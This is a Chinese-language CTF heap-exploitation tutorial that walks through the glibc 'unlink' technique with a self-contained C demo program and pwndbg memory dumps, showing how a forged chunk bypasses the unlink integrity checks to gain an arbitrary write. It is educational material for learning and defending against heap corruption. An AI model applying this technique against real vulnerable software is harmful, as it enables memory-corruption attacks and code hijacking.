ctf pwn中的unlink exploit(堆利用)

unlink简介

unlink的目的是把一个双向链表中的空闲块拿出来，如图。

也就是

设置 P->fd->bk = P->bk.

设置 P->bk->fd = P->fd.

unlink时执行的检查

以前的unlink是没有检查的，很容易利用，不过现在多了两项检查，所以在利用时候要绕过这些检查。

  Function Security Check Error    unlink chunk size是否等于next chunk(内存意义上的)的prev_size corrupted size vs. prev_size  unlink 检查是否P->fd->bk == P 以及 P->bk->fd == P corrupted double-linked list   

unlink exploit

准备

通过一个例子来学习一下，这个例子是Heap Exploitation系列的unlink，为了便于理解，我会用gdb详细的调试一下。

首先，编译程序,我使用的系统是ubuntu14.04 64位，将下面的示例代码编译出来，带上-g参数。

sakura@ubuntu:~$ gcc -g unlink.c -o unlink

unlink.c: In function ‘main’:

unlink.c:46:3: warning: format ‘%x’ expects argument of type ‘unsigned int’, but argument 2 has type ‘long long unsigned int’ [-Wformat=]

printf("%x\n", chunk1[3]);

^

#include

#include

#include

#include

struct chunk_structure {

size_t prev_size;

size_t size;

struct chunk_structure *fd;

struct chunk_structure *bk;

char buf[10];              // padding

};

int main() {

unsigned long long *chunk1, *chunk2;

struct chunk_structure *fake_chunk, *chunk2_hdr;

char data[20];

// First grab two chunks (non fast)

chunk1 = malloc(0x80);

chunk2 = malloc(0x80);

printf("%p\n", &chunk1);

printf("%p\n", chunk1);

printf("%p\n", chunk2);

// Assuming attacker has control over chunk1's contents

// Overflow the heap, override chunk2's header

// First forge a fake chunk starting at chunk1

// Need to setup fd and bk pointers to pass the unlink security check

fake_chunk = (struct chunk_structure *)chunk1;

fake_chunk->fd = (struct chunk_structure *)(&chunk1 - 3); // Ensures P->fd->bk == P

fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P

// Next modify the header of chunk2 to pass all security checks

chunk2_hdr = (struct chunk_structure *)(chunk2 - 2);

chunk2_hdr->prev_size = 0x80;  // chunk1's data region size

chunk2_hdr->size &= ~1;        // Unsetting prev_in_use bit

// Now, when chunk2 is freed, attacker's fake chunk is 'unlinked'

// This results in chunk1 pointer pointing to chunk1 - 3

// i.e. chunk1[3] now contains chunk1 itself.

// We then make chunk1 point to some victim's data

free(chunk2);

printf("%p\n", chunk1);

printf("%x\n", chunk1[3]);

chunk1[3] = (unsigned long long)data;

strcpy(data, "Victim's data");

// Overwrite victim's data using chunk1

chunk1[0] = 0x002164656b636168LL;

printf("%s\n", data);

return 0;

}

我使用了一个gdb插件pwndbg(应该是插件吧？)，需要安装的话。

git clone https://github.com/pwndbg/pwndbg

cd pwndbg

./setup.sh

开始调试

pwndbg> b 20

Breakpoint 1 at 0x400695: file unlink.c, line 20.

pwndbg> r

pwndbg> n

这样就开始malloc第一个chunk了，返回的地址放在rax里，然后存到栈里。

继续看第二个chunk的地址

pwndbg> n

接下来的三条命令其实就是输出我们刚刚调试出来的chunk地址的，所以过掉就行了，不过可以检查一下我们找的是不是对的。

pwndbg> b 25

Breakpoint 2 at 0x4006f3: file unlink.c, line 25.

pwndbg> c

Continuing.

0x7fffffffdd60

0x602010

0x6020a0

然后来详细的说明一下，是怎么unlink exploit的。

假设攻击者已经控制了chunk1的数据，并且可以溢出到chunk2的元数据。

因为我们能够控制chunk1的数据，所以当然可以在chunk1里伪造一个chunk出来。

fake_chunk = (struct chunk_structure *)chunk1;

我们知道，返回给我们的chunk实际上是mem指针,如下图的mem就是chunk1

通过将chunk1强制转换为struct chunk_structure结构体，就伪造出了一个chunk。

相当于

然后我们看一下此时的chunk1的内存。

pwndbg> x /10gx 0x602000

0x602000:    0x0000000000000000 0x0000000000000091

0x602010:    0x0000000000000000 0x0000000000000000

0x602020:    0x0000000000000000 0x0000000000000000

0x602030:    0x0000000000000000 0x0000000000000000

0x602040:    0x0000000000000000 0x0000000000000000

再看一下fake_chunk,地址为0xffffcf80，指向0x0804b008（mem)

pwndbg> p $rbp-0x40

$1 = (void *) 0x7fffffffdd70

pwndbg> x /x 0x7fffffffdd70

0x7fffffffdd70:    0x0000000000602010

通过检查点1

接下来要确保chunk->fd->bk == chunk

fake_chunk->fd = (struct chunk_structure *)(&chunk1 - 3); // Ensures P->fd->bk == P

如果不熟悉指针加减运算的，可以参考这篇文章&chunk1是指存放chunk1这个被分配出来的heap的地址的栈地址,即0x7fffffffdd60

pwndbg> stack 10

00:0000│ rsp  0x7fffffffdd60 —▸ 0x602010 ◂— 0x0

01:0008│      0x7fffffffdd68 —▸ 0x6020a0 ◂— 0x0

02:0010│      0x7fffffffdd70 —▸ 0x602010 ◂— 0x0

03:0018│      0x7fffffffdd78 —▸ 0x40084d (__libc_csu_init+77) ◂— add    rbx, 1

04:0020│      0x7fffffffdd80 —▸ 0x7fffffffddb0 ◂— 0x0

05:0028│      0x7fffffffdd88 ◂— 0x0

06:0030│      0x7fffffffdd90 —▸ 0x400800 (__libc_csu_init) ◂— push  r15

07:0038│      0x7fffffffdd98 ◂— 0xb7dbaa1d9dced400

08:0040│      0x7fffffffdda0 —▸ 0x7fffffffde90 ◂— 0x1

09:0048│      0x7fffffffdda8 ◂— 0x0

此时的chunk1

pwndbg> x /10gx 0x602000

0x602000:    0x0000000000000000 0x0000000000000091

0x602010:    0x0000000000000000 0x0000000000000000

0x602020:    0x00007fffffffdd48 0x0000000000000000

0x602030:    0x0000000000000000 0x0000000000000000

0x602040:    0x0000000000000000 0x0000000000000000

接下来要确保chunk->bk->fd == chunk

fake_chunk->bk = (struct chunk_structure *)(&chunk1 - 2); // Ensures P->bk->fd == P

此时的chunk1

pwndbg> x /10gx 0x602000

0x602000:    0x0000000000000000 0x0000000000000091

0x602010:    0x0000000000000000<=fake_chunk(mem)    0x0000000000000000

0x602020:    0x00007fffffffdd48<=fake_chunk->fd    0x00007fffffffdd50<=fake_chunk->bk

0x602030:    0x0000000000000000 0x0000000000000000

0x602040:    0x0000000000000000 0x0000000000000000

我相信到这个时候你已经凌乱了,因为我一开始看到这里的时候也挺凌乱的（因为我指针学的不好emmm..)

让我们再理一下。

首先观察一下栈段，我们知道我们的变量都是存在栈上的,chunk1,fake_chunk都是指针,指针的值都是一个表示地址空间中某个存储器单元的整数,这也就是我们说的指向。

unsigned long long *chunk1, *chunk2;

struct chunk_structure *fake_chunk, *chunk2_hdr;

pwndbg> stack 10

00:0000│ rsp  0x7fffffffdd60 —▸ 0x602010 ◂— 0x0

01:0008│      0x7fffffffdd68 —▸ 0x6020a0 ◂— 0x0

02:0010│      0x7fffffffdd70 —▸ 0x602010 ◂— 0x0

03:0018│      0x7fffffffdd78 —▸ 0x40084d (__libc_csu_init+77) ◂— add    rbx, 1

04:0020│      0x7fffffffdd80 —▸ 0x7fffffffddb0 ◂— 0x0

05:0028│      0x7fffffffdd88 ◂— 0x0

06:0030│      0x7fffffffdd90 —▸ 0x400800 (__libc_csu_init) ◂— push  r15

07:0038│      0x7fffffffdd98 ◂— 0xb7dbaa1d9dced400

08:0040│      0x7fffffffdda0 —▸ 0x7fffffffde90 ◂— 0x1

09:0048│      0x7fffffffdda8 ◂— 0x0

chunk1=0x602010

&chunk1=0x7fffffffdd60

fake_chunk=0x602010

&fake_chunk=0x7fffffffdd70

然后我们再看一下fake_chunk->fd，和fake_chunk_bk的值是多少。

pwndbg> x /10gx 0x602000

0x602000:    0x0000000000000000 0x0000000000000091

0x602010:    0x0000000000000000<=fake_chunk(mem)    0x0000000000000000

0x602020:    0x00007fffffffdd48<=fake_chunk->fd    0x00007fffffffdd50<=fake_chunk->bk

0x602030:    0x0000000000000000 0x0000000000000000

0x602040:    0x0000000000000000 0x0000000000000000

fake_chunk->fd=0x00007fffffffdd48

fake_chunk->bk=0x00007fffffffdd50

需要知道的是，fd和bk的类型同样是struct chunk_structure ，也就是说fake->chunk->fd/bk指向的内存也是"*结构体"

struct chunk_structure *fd;

struct chunk_structure *bk;

所以这个指向的"结构体"是这样的。

pwndbg> x /10gx 0x00007fffffffdd48

0x7fffffffdd48:    0x00007ffff7ffe1c8->prev_size    0x0000000000000003->size

0x7fffffffdd58:    0x00000000004006f3->fd    0x0000000000602010->bk

0x7fffffffdd68:    0x00000000006020a0 0x0000000000602010

0x7fffffffdd78:    0x000000000040084d 0x00007fffffffddb0

0x7fffffffdd88:    0x0000000000000000 0x0000000000400800

所以fake_chunk->fd->bk=0x0000000000602010=chunk1

而我们知道fake_chunk=chunk1。

fake_chunk = (struct chunk_structure *)chunk1;

所以这样就过了chunk->fd->bk==chunk的检查 chunk->bk->fd == chunk也是同理的

通过检查点2

然后为了通过检查点chunk size是否等于next chunk(内存意义上的)的prev_size,我们需要修改chunk2的prev_size

chunk2_hdr = (struct chunk_structure *)(chunk2 - 2);

chunk2_hdr->prev_size = 0x80;  // chunk1's data region size

chunk2_hdr->size &= ~1;        // Unsetting prev_in_use bit

pwndbg> x /10gx 0x602090

0x602090:    0x0000000000000080 0x0000000000000090

0x6020a0:    0x0000000000000000 0x0000000000000000

0x6020b0:    0x0000000000000000 0x0000000000000000

0x6020c0:    0x0000000000000000 0x0000000000000000

0x6020d0:    0x0000000000000000 0x0000000000000000

触发unlink

当我们free(chunk2)的时候，因为prev_in_use位被置0，代表前一个chunk（也就是我们的fake_chunk)也处于free，连续的空闲堆块合并而进行unlink操作。

也就是设置

P->fd->bk = P->bk.

P->bk->fd = P->fd.

可以看出fake_chunk->fd->bk和fake_chunk->bk->fd都指向(或者说等于)chunk1,即0x0000000000602010，所以只需要关注第二次操作即可。

P->fd即fake_chunk->fd=0x00007fffffffdd48

所以unlink之后,P->bk->fd由0x602010变为0x00007fffffffdd48

00:0000│ rsp  0x7fffffffdd60 —▸ 0x602010 <=P->bk->fd

01:0008│      0x7fffffffdd68 —▸ 0x6020a0 ◂— 0x0

02:0010│      0x7fffffffdd70 —▸ 0x602010 ◂— 0x0

03:0018│      0x7fffffffdd78 —▸ 0x602090 ◂— 0x80

04:0020│      0x7fffffffdd80 —▸ 0x7fffffffddb0 ◂— 0x0

05:0028│      0x7fffffffdd88 ◂— 0x0

06:0030│      0x7fffffffdd90 —▸ 0x400800 (__libc_csu_init) ◂— push  r15

07:0038│      0x7fffffffdd98 ◂— 0xb7dbaa1d9dced400

变为

00:0000│ rsp  0x7fffffffdd60 —▸ 0x7fffffffdd48 <=P->bk->fd

01:0008│      0x7fffffffdd68 —▸ 0x6020a0 ◂— 0x0

02:0010│      0x7fffffffdd70 —▸ 0x602010 ◂— 0x0

03:0018│      0x7fffffffdd78 —▸ 0x602090 ◂— 0x80

04:0020│      0x7fffffffdd80 —▸ 0x7fffffffddb0 ◂— 0x0

05:0028│      0x7fffffffdd88 ◂— 0x0

06:0030│      0x7fffffffdd90 —▸ 0x400800 (__libc_csu_init) ◂— push  r15

07:0038│      0x7fffffffdd98 ◂— 0xb7dbaa1d9dced400

也就是说现在chunk1的值变成了0x7fffffffdd48，chunk1[3]实际上就是chunk1。

45 printf("%p\n", chunk1);

46 printf("%x\n", chunk1[3]);

...

pwndbg> b 47

Breakpoint 3 at 0x400788: file unlink.c, line 47.

pwndbg> c

Continuing.

0x7fffffffdd48

ffffdd48

exp

改变chunk1[3]就是改变chunk1,在本例中, chunk1用于指向变量data并且通过改变chunk1从而影响到了该变量。

chunk1[3] = (unsigned long long)data;

可以看出现在chunk1的值已经变成了data的地址0x7fffffffdd80

00:0000│ rdx rsp  0x7fffffffdd60 —▸ 0x7fffffffdd80 —▸ 0x7fffffffddb0 ◂— 0x0

改变data的值为Victim's data

strcpy(data, "Victim's data");

在内存中查看

pwndbg> x /s 0x7fffffffdd80

0x7fffffffdd80:    "Victim's data"

现在的chunk1已经指向data了，通过给chunk1[0]赋值，其实就是给data赋值。

chunk1[0] = 0x002164656b636168LL;

查看内存

pwndbg> x /s 0x7fffffffdd80

0x7fffffffdd80:    "hacked!"

果然已经变了。

字符串已经变成了hacked!

pwndbg> n

hacked!

不知道这些指针跳来跳去的有没有把你绕晕呢~如果晕了的话就自己调一调吧~

参考链接

https://heap-exploitation.dhavalkapil.com/attacks/unlink_exploit.html

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